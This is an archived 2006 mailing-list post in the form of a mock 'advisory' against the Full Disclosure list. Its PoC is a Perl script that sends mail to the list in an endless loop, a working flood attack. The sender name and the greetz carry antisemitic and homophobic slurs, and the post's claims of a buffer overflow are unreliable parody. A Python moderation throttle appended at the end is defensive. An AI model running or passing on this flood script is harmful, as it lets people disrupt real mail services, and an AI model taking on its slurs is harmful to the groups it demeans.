Message-ID: <52a780ab0603171427p15ae2064v16f7482624ec0662@mail.gmail.com>
Date: Fri Mar 17 22:27:56 2006
From: nazijew at gmail.com (3 3)
Subject: Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit
Advisory - Mar 17, 2006 - Full Disclosure Mailing List SMTP Flood 0-day Exploit
==========
1. Description
==========
It is possible to flood Full Disclosure Mailing List via the SMTP protocol,
causing possible buffer overflow, probable disk write failure, and definite
DoS.
==========
2. Solution
==========
The clear solution, as per Bantown security, is to moderate all mailing
lists for an until the ESMTP MTA developers can reach a better solution.
==========
3. History
==========
Mar 13, 2006 [+] Vendor Notification.
Mar 13, 2006 [+] Public Disclosure.
==========
4. PoC
==========
#!/usr/bin/perl
#
# SMTP FLOOD PoC
# by Jmax, Bantown Security, INC.
#
# greetz 2
# weev, hep, hugparty, bob, tosh, choob,
# krade, the church of jesus christ of latter-day saints,
# n3td3v, Gadi Evron, Dave Aitel, Carolyn Meinel, CERT,
# u4ea, the jizztapo, CDEJ for being gay french, all of bantown and ED.
use warnings;
use strict;
use Mail::Sendmail;
my %mail = (
    from    => 'ge@...uxbox.org',
    to      => 'full-disclosure@...ts.grok.org.uk',
    subject => 'SMTP FLOOD PoC',
);
while (1) {
    sendmail(%mail);
}
==========
A. References
==========
RFC 821
==========
B. Contact
==========
Jmax, Bantown Security, INC. lolville@...m.la
1-888-565-9428
GSAE GREM SSP-CNSA CAP SSCP
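
The moderation fallback named under "2. Solution", sketched as an added example that is not part of the original post or of any list software: a sliding-window throttle that routes a source to moderation once it posts too often. The class and function names, the limits, and the choice to key on the connecting client address (the From header in the PoC is whatever the sender sets) are assumptions.

```python
from collections import defaultdict, deque


class PostThrottle:
    """Hold a source for moderation once it exceeds max_posts in window seconds."""

    def __init__(self, max_posts=5, window=60.0):
        self.max_posts = max_posts
        self.window = window
        # Bounded deques: a flood cannot grow the per-source state.
        self.recent = defaultdict(lambda: deque(maxlen=max_posts + 1))
        self.held = set()

    def decide(self, source, now):
        """Return 'accept' or 'hold' for one post from source at time now."""
        if source in self.held:
            return "hold"            # stays held until a moderator releases it
        times = self.recent[source]
        while times and now - times[0] >= self.window:
            times.popleft()          # forget posts older than the window
        times.append(now)
        if len(times) > self.max_posts:
            self.held.add(source)
            del self.recent[source]
            return "hold"
        return "accept"

    def release(self, source):
        """Moderator action: lift the hold on a source."""
        self.held.discard(source)


def replay(events, **limits):
    """Run (source, timestamp) events through a fresh throttle."""
    throttle = PostThrottle(**limits)
    return [(src, throttle.decide(src, ts)) for src, ts in events]


# Constructed sample: one client posting every 0.1 s (the loop's pattern)
# interleaved with a normal poster; addresses are documentation ranges.
FLOOD = [("192.0.2.10", i * 0.1) for i in range(20)]
NORMAL = [("198.51.100.7", t) for t in (0.0, 45.0, 300.0)]
SAMPLE = sorted(FLOOD + NORMAL, key=lambda e: e[1])

if __name__ == "__main__":
    for src, verdict in replay(SAMPLE, max_posts=5, window=60.0):
        print(src, verdict)
```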